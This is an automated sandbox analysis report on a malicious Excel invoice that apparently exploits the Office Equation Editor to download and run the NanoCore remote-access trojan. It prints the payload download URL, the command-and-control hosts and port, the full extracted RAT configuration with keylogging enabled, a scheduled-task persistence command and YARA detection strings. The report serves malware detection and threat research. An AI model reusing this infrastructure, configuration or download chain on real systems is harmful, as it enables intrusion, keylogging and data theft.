Loading ...

Play interactive tourEdit tour

Analysis Report SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx

Overview

General Information

Sample Name:SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx
Analysis ID:385193
MD5:216f2652001700d1f7ac1109a508ce2d
SHA1:82d3a0b7bb096d03f9f1a4de5444c216849d576b
SHA256:9b393f90c5fa6aabf671d0f80a9ee0e4f44330cd3ee14dc0d9066f978d9435ff
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: NanoCore
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1144 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 1320 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2480 cmdline: 'C:\Users\Public\vbc.exe' MD5: A3CBEB3E732B11954572B3EE6755242C)
      • schtasks.exe (PID: 2676 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • RegSvcs.exe (PID: 2696 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe MD5: 72A9F09010A89860456C6474E2E6D25C)
  • smtpsvc.exe (PID: 1296 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' MD5: 72A9F09010A89860456C6474E2E6D25C)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "f57d5a77-8670-45ef-b736-5f3a07b6", "Group": "Addora", "Domain1": "79.134.225.30", "Domain2": "nassiru1155.ddns.net", "Port": 1144, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xf7ad:$x1: NanoCore.ClientPluginHost
  • 0xf7da:$x2: IClientNetworkHost
00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0xf7ad:$x2: NanoCore.ClientPluginHost
  • 0x10888:$s4: PipeCreated
  • 0xf7c7:$s5: IClientLoggingHost
00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x1ff715:$x1: NanoCore.ClientPluginHost
      • 0x231f35:$x1: NanoCore.ClientPluginHost
      • 0x1ff752:$x2: IClientNetworkHost
      • 0x231f72:$x2: IClientNetworkHost
      • 0x203285:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      • 0x235aa5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.RegSvcs.exe.380d42c.9.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xd9ad:$x1: NanoCore.ClientPluginHost
      • 0xd9da:$x2: IClientNetworkHost
      7.2.RegSvcs.exe.380d42c.9.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xd9ad:$x2: NanoCore.ClientPluginHost
      • 0xea88:$s4: PipeCreated
      • 0xd9c7:$s5: IClientLoggingHost
      7.2.RegSvcs.exe.380d42c.9.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        4.2.vbc.exe.26b2ea0.3.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          4.2.vbc.exe.3890588.5.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
          • 0x1018d:$x1: NanoCore.ClientPluginHost
          • 0x429ad:$x1: NanoCore.ClientPluginHost
          • 0x101ca:$x2: IClientNetworkHost
          • 0x429ea:$x2: IClientNetworkHost
          • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
          • 0x4651d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
          Click to see the 37 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 13.235.115.155, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1320, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1320, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nano[1].exe
          Sigma detected: NanoCoreShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2696, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
          Sigma detected: Scheduled temp file as task from temp locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\Public\vbc.exe' , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 2480, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp', ProcessId: 2676

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://covid19vaccinations.hopto.org/nano.exeAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "f57d5a77-8670-45ef-b736-5f3a07b6", "Group": "Addora", "Domain1": "79.134.225.30", "Domain2": "nassiru1155.ddns.net", "Port": 1144, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
          Multi AV Scanner detection for domain / URLShow sources
          Source: http://covid19vaccinations.hopto.org/nano.exeVirustotal: Detection: 12%Perma Link
          Multi AV Scanner detection for submitted fileShow sources
          Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsxVirustotal: Detection: 29%Perma Link
          Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsxReversingLabs: Detection: 22%
          Yara detected Nanocore RATShow sources
          Source: Yara matchFile source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY
          Source: Yara matchFile source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nano[1].exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\gmSlQSien.exeJoe Sandbox ML: detected
          Source: 7.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
          Source: 7.2.RegSvcs.exe.840000.3.unpackAvira: Label: TR/NanoCore.fadte

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: System.pdbWindows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
          Source: Binary string: ystem.pdb- source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
          Source: Binary string: =T3UpC:\Windows\System.pdbA!`y source: RegSvcs.exe, 00000007.00000002.2395879525.0000000004FDC000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\RegSvcs.pdbN source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
          Source: Binary string: ps.pdb source: RegSvcs.exe, 00000007.00000002.2394056812.00000000008BD000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\dll\System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
          Source: Binary string: System.EnterpriseServices.Wrapper.pdb source: smtpsvc.exe, 00000008.00000002.2225121272.0000000001D90000.00000002.00000001.sdmp
          Source: Binary string: C:\Windows\System.pdb``[ source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
          Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000007.00000003.2194043943.00000000006E3000.00000004.00000001.sdmp, smtpsvc.exe, smtpsvc.exe.7.dr
          Source: Binary string: indows\System.pdbpdbtem.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\symbols\dll\System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
          Source: Binary string: System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
          Source: Binary string: System.pdb8 source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
          Source: Binary string: mscorrc.pdb source: vbc.exe, 00000004.00000002.2194187602.0000000000B10000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2394185585.0000000002130000.00000002.00000001.sdmp
          Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
          Source: excel.exeMemory has grown: Private usage: 4MB later: 73MB
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: global trafficDNS query: name: covid19vaccinations.hopto.org
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 13.235.115.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 13.235.115.155:80

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: nassiru1155.ddns.net
          Source: Malware configuration extractorURLs: 79.134.225.30
          Uses dynamic DNS servicesShow sources
          Source: unknownDNS query: name: nassiru1155.ddns.net
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 79.134.225.30:1144
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 12 Apr 2021 06:02:45 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.4.16Last-Modified: Mon, 12 Apr 2021 05:41:25 GMTETag: "c3e00-5bfbff6ea5e4b"Accept-Ranges: bytesContent-Length: 802304Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 85 dd 73 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 32 0b 00 00 0a 01 00 00 00 00 00 92 50 0b 00 00 20 00 00 00 60 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 50 0b 00 4f 00 00 00 00 60 0b 00 ec 07 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 98 30 0b 00 00 20 00 00 00 32 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ec 07 01 00 00 60 0b 00 00 08 01 00 00 34 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0c 00 00 02 00 00 00 3c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 50 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 1c 7d 00 00 64 75 00 00 03 00 00 00 01 00 00 06 80 f2 00 00 c0 5d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1e 00 00 0a 28 1f 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 20 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 21 00 00 0a 00 02 16 28 22 00 00 0a 00 02 17 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 02 16 28 25 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f ed 00 00 06 28 26 00 00 0a 00 2a 26 00 02 28 27 00 00 0a 00 2a ce 73 28 00 00 0a 80 01 00 00 04 73 29 00 00 0a 80 02 00 00 04 73 2a 00 00 0a 80 03 00 00 04 73 2b 00 00 0a 80 04 00 00 04 73 2c 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 30 00 00 0a 0
          Source: Joe Sandbox ViewIP Address: 79.134.225.30 79.134.225.30
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH
          Source: global trafficHTTP traffic detected: GET /nano.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: covid19vaccinations.hopto.orgConnection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
          Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
          Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
          Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
          Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
          Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
          Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
          Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
          Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
          Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
          Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
          Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
          Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
          Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3B54A74.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /nano.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: covid19vaccinations.hopto.orgConnection: Keep-Alive
          Source: unknownDNS traffic detected: queries for: covid19vaccinations.hopto.org
          Source: vbc.exe, 00000004.00000002.2202209803.0000000005540000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2395892834.0000000004FE0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: vbc.exe, 00000004.00000002.2202209803.0000000005540000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2395892834.0000000004FE0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: RegSvcs.exe, 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

          E-Banking Fraud:

          barindex
          Yara detected Nanocore RATShow sources
          Source: Yara matchFile source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY
          Source: Yara matchFile source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000007.00000002.2393755361.00000000005C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: Process Memory Space: vbc.exe PID: 2480, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: Process Memory Space: vbc.exe PID: 2480, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 7.2.RegSvcs.exe.27d1644.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
